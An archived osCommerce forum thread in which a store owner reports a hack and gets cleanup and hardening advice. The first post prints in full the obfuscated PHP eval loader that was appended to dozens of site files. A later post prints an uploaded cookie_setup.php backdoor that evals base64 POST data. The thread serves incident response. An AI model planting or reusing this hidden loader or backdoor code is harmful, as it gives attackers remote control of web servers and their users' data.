Jump to content

Archived

This topic is now archived and is closed to further replies.

Atrosh

Critical: New dangerous exploit: DragosImport Domboware attacks

Recommended Posts

Hello everyone,

 

My oscommerce site just got shut down, since I apparently had malware scripts uploaded on my site. I had gotten "fleeting" warnings once or twice that I had malware on my site through my antivirus program, but I disregarded it in the end since I couldn't recreate the warnings, all "online scanners" reported my site as malware free, and even google webmaster tools reported it as malware free. I now believe the reason for this is that I was the subject of a brand new attack. (On a side note, I must complain on how much bad luck I have; the site went "live" 3rd December, the attacks happened 4th Dec 23:12, and the malware wasn't reported on in the Internet until the 5th of December, in other words my brand new site was the subject of a brand new attack! Neat, huh?)

 

This attack is supposedly targeting a "new" weakness found in osCommerce, for more info about the exploit, please read the following link: http://www.stoptheha...boware-attacks/

 

The attack

 

This code:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

 

has been added to the end of the following files:


includes/languages/swedish/modules/header_tags/ht_product_title.php	   // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_opensearch.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_manufacturer_title.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_mailchimp_360.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_google_analytics.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_category_title.php // <-- Header Tags SEO Module
includes/languages/swedish/index.php
includes/languages/german/index.php
includes/languages/espanol/index.php
includes/languages/english/index.php
includes/header_tags.php // <-- Header Tags SEO Module
includes/header.php
includes/functions/header_tags.php // <-- Header Tags SEO Module
includes/footer.php
includes/boxes/headertags_seo_silo_W_Products.php // <-- Header Tags SEO Module
includes/boxes/headertags_seo_silo.php // <-- Header Tags SEO Module
includes/boxes/header_tags.php // <-- Header Tags SEO Module
"admin"/includes/languages/german/index.php
"admin"/includes/languages/russian/index.php
"admin"/includes/languages/espanol/index.php
"admin"/attributeManager/includes/attributeManagerHeader.inc.php
"admin"/includes/boxes/header_tags_seo.php // <-- Header Tags SEO Module
"admin"/header_tags_test.php // <-- Header Tags SEO Module
"admin"/header_tags_seo_silo.php // <-- Header Tags SEO Module
"admin"/header_tags_seo_popup_logotext.php // <-- Header Tags SEO Module
"admin"/header_tags_seo_popup_help.php // <-- Header Tags SEO Module
"admin"/header_tags_seo.php // <-- Header Tags SEO Module
"admin"/header_tags_fill_tags.php // <-- Header Tags SEO Module
"admin"/includes/footer.php
"admin"/includes/functions/header_tags.php // <-- Header Tags SEO Module
"admin"/includes/functions/header_tags_general.php // <-- Header Tags SEO Module
"admin"/includes/header.php
"admin"/includes/languages/english/index.php
"admin"/index.php
"admin"/includes/languages/swedish/header_tags_seo.php // <-- Header Tags SEO Module
"admin"/includes/languages/swedish/header_tags_seo_popup_help.php // <-- Header Tags SEO Module
"admin"/includes/languages/swedish/header_tags_seo_popup_logotext.php // <-- Header Tags SEO Module
"admin"/includes/languages/swedish/header_tags_seo_silo.php // <-- Header Tags SEO Module
"admin"/includes/languages/swedish/index.php
"admin"/includes/languages/swedish/modules/cfg_modules/cfgm_header_tags.php// <-- Header Tags SEO Module
includes/modules/header_tags_social_bookmarks.php // <-- Header Tags SEO Module
index.php

 

Note that 26/42 of the files infected belonged to the Header Tags SEO Module - however this does NOT neccessarily mean that the weakness lies in the module itself; although this MAY be the case, there could be a number of other reasons why the Header Tags SEO files were infected; at this point, I have no information regarding what the weakness/exploit is.

 

I've tried looking around to see what the exploit/weakness in this particular case is, but since this exploit is so new there is no information on how to prevent these attacks. Obviously deleting all the infected code would be a temporary solution, but unless the source of the problem is found, it may just happen again.

 

Guys, this is where you come in play. Please help me find the reason I've been attacked! As stated in the link earlier (regarding the attack), this exploit has apparently affected a lot of osCommerce stores, so I'm sure my case is not unique. I'll provide any and all information you may need.

 

NOTE ON SECURITY MEASURES USED ON THE SITE: Now this is a bit embarassing, but at the time of the attack (4th dec 23:12 GMT), I had no additional security measures installed on the site. All the security measures were added 6-8th December. Please do note however that the site went "live" the 3rd of December, I submitted my google sitemap the 4th and got hacked the SAME DAY. I couldn't have expected that, but now I know to not procastinate adding security measures to even 1 hour after launching the site..

 

Best regards,

Atra

 

Edit: I am running v2.2 RC1

Share this post


Link to post
Share on other sites

You should really not start a new site using an old software version, 2.2 RC1 have many "security" holes. (At the very least you should have done all the required security updates and adding in the required security mods before making the site live)

 

For new sites you should definitely use the latest stable version which at the time of writing this is V2.31

Share this post


Link to post
Share on other sites

Yeah, problem was when I started making the site I didn't realize the version was that old, and so I've just kept building on it... I'm guessing changing the version would take atleast a couple of days of full-time work, considering all the files I've changed?

 

However, I have added security measures (unfortunately after I got infected but prior to knowing it), using the sticky post in this forum. Is there another list with required security updates I should know about? I think that would be faster than to reinstall the whole site

 

Edit: I think I found a list of recommended security updates, if this was what you were referencing: http://forums.oscommerce.com/topic/375288-updated-security-thread/page__p__1584648

Share this post


Link to post
Share on other sites

What I've done so far:

 

- Removed all the bad code from the infected files

- Manually browsed through all occurences of ".js" in the files on my site: nothing suspicious found

 

I'll keep you updated... If anyone has a suggestion on what to look for or how the site might have gotten infected in the first place, please help me out.

Share this post


Link to post
Share on other sites

Make sure your site is totally clean, rename your admin folder and make sure its secured properly with a htaccess login.

 

Delete these 2 files in admin: file_manager.php and define_language.php

 

And follow the recommendations in: Updated Security Thread

Share this post


Link to post
Share on other sites

Thank you for your help.

 

I had already done those things, unfortunately _after_ getting hacked but prior to knowing it. I am currently implementing the changes listed in the Updated Security Thread you linked to - thanks again.

 

I will post here if I find anything else specific to the exploit.

Share this post


Link to post
Share on other sites

According to Harald (http://forums.oscommerce.com/topic/382081-exploit-dragosimport-domboware-attacks/) the weakness used by this malware is

 

 

The exploit does not work on:

 

*) a secured v2.2 installation (htpasswd protected admin)

*) v2.3.0/v2.3.1

*) v3.0.x

 

It's advisable to htpasswd protect all admin apps on your site, regardless of what software is installed.

 

Kind regards,

Share this post


Link to post
Share on other sites

You may want to consider installing SiteMonitor. It would have listed all of the changes, saving you a lot of time in fixing the problem, and will find them, even now, if you run its hacker test. When a hacker makes changes like this, he will almost always upload his files too so just cleaning the files may not do you much good.

Share this post


Link to post
Share on other sites

You may want to consider installing SiteMonitor. It would have listed all of the changes, saving you a lot of time in fixing the problem, and will find them, even now, if you run its hacker test. When a hacker makes changes like this, he will almost always upload his files too so just cleaning the files may not do you much good.

 

Ok so I ran the hacker test.... A total of 86 warnings, but most of them were false positives from what I can gather.

I've tried to filter out the ones I find suspicious, posting them here.. Running 2.2 RC1.

 

cookie_setup.php line 13:


<?php
/*
 $Id: cookie_setup.php 1739 2007-12-20 00:52:16Z hpdl $
 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com
 Copyright (c) 2003 osCommerce
 Released under the GNU General Public License
*/
if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a2226ed57a"])) @eval(base64_decode($_POST["a2226ed57a"])); exit; }
?>


 

headsent.php, line 2:

0003  error_reporting(0);

 

In the headsent.php file, it basically opens with setting error_reporting(0); and then proceeds to the rest of the file... is this normal?

 

And I'm especially suspicious about the cookie_setup.php thing, looks very.. malwareish?

 

Edit: Oh. cookie_setup.php isn't even supposed to exist. I suppose this is what the hacker must have uploaded to regain access whenever he wanted to? Like a cookie that always enables him to stay logged on the admin section or something? I deleted the file and have already changed the name of my admin folder (again), added htpasswd protection and changed all passwords (ftp, db etc)... Can I feel safe now?

Share this post


Link to post
Share on other sites

 

Ok so I ran the hacker test.... A total of 86 warnings, but most of them were false positives from what I can gather.

I've tried to filter out the ones I find suspicious, posting them here.. Running 2.2 RC1.

 

cookie_setup.php line 13:

 

error_reporting(0);

 

In the headsent.php file, it basically opens with setting error_reporting(0); and then proceeds to the rest of the file... is this normal?

 

And I'm especially suspicious about the cookie_setup.php thing, looks very.. malwareish?

 

Edit: Oh. cookie_setup.php isn't even supposed to exist. I suppose this is what the hacker must have uploaded to regain access whenever he wanted to? Like a cookie that always enables him to stay logged on the admin section or something? I deleted the file and have already changed the name of my admin folder (again), added htpasswd protection and changed all passwords (ftp, db etc)... Can I feel safe now?

Good catch. The addition of the cookie_setup file is a common hacking technique. It is usually accompanied by a change to the english/cookie_usage.php file (or whatever your languares are). Also, most legitimate oscommerce code don't start with turning error reporting off. That is almost always a sign it is a hacker file.

 

Can you feel safe? I would say safer. Hackers are always trying to find new ways in and may find a new method tomorrow.

Share this post


Link to post
Share on other sites

Good catch. The addition of the cookie_setup file is a common hacking technique. It is usually accompanied by a change to the english/cookie_usage.php file (or whatever your languares are). Also, most legitimate oscommerce code don't start with turning error reporting off. That is almost always a sign it is a hacker file.

 

Can you feel safe? I would say safer. Hackers are always trying to find new ways in and may find a new method tomorrow.

 

Thank you very much for your help.

A quick note on "headsent.php" - I now remember downloading this file when trying to fix the "headers already sent" error I had a while back, and the error_reporting(0) is supposed to be in there.

 

Just have a quick question on SiteMonitor; I get the warning that I have non-image files in my image folder - however I've double and triplechecked the folder, I even downloaded it's entire contents to my PC then wrote a python script to show me all files that weren't jpg, png, gif, tif, or bmp, and the only file which met that critera was the .htaccess file. Could it be that .tif or .bmp don't count as images in the addon, or am I missing something?

 

Of course :) I've learned to always stay updated on the latest security threats regarding osCommerce now, and hopefully won't have this happen to me again (not really looking forward to another 12 hour anti-crack marathon).

 

Thanks again for the help,

Best regards,

Share this post


Link to post
Share on other sites

Just have a quick question on SiteMonitor; I get the warning that I have non-image files in my image folder - however I've double and triplechecked the folder, I even downloaded it's entire contents to my PC then wrote a python script to show me all files that weren't jpg, png, gif, tif, or bmp, and the only file which met that critera was the .htaccess file. Could it be that .tif or .bmp don't count as images in the addon, or am I missing something?

The code only looks for .php and .txt files. It should display the files it finds. If it is not displaying them, you may have the wrong file. The last version was uploaded with a file that should have been updated. I haven't had time to update the package but the correct file is posted in the support thread.

Share this post


Link to post
Share on other sites

Can I feel safe now?

 

If you have followed the security recommendations, change the admin directory name, etc, and cleaned out your files and had a look through the configuration settings to make sure no extra code has been added in there, then your site will be safe to use. The osC_Sec addon has the actual security patch in it for the specific security hole that was exploited by these attackers. So if you have followed the install instructions then the site will actually be 'patched' against that attack.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

 

If you have followed the security recommendations, change the admin directory name, etc, and cleaned out your files and had a look through the configuration settings to make sure no extra code has been added in there, then your site will be safe to use. The osC_Sec addon has the actual security patch in it for the specific security hole that was exploited by these attackers. So if you have followed the install instructions then the site will actually be 'patched' against that attack.

 

Yeah I cleaned out all files, followed all of the security recommendations, changed the admin name again (and all passwords), and installed osc_sec (I also went through all links in your signature etc) - thanks!

Share this post


Link to post
Share on other sites

×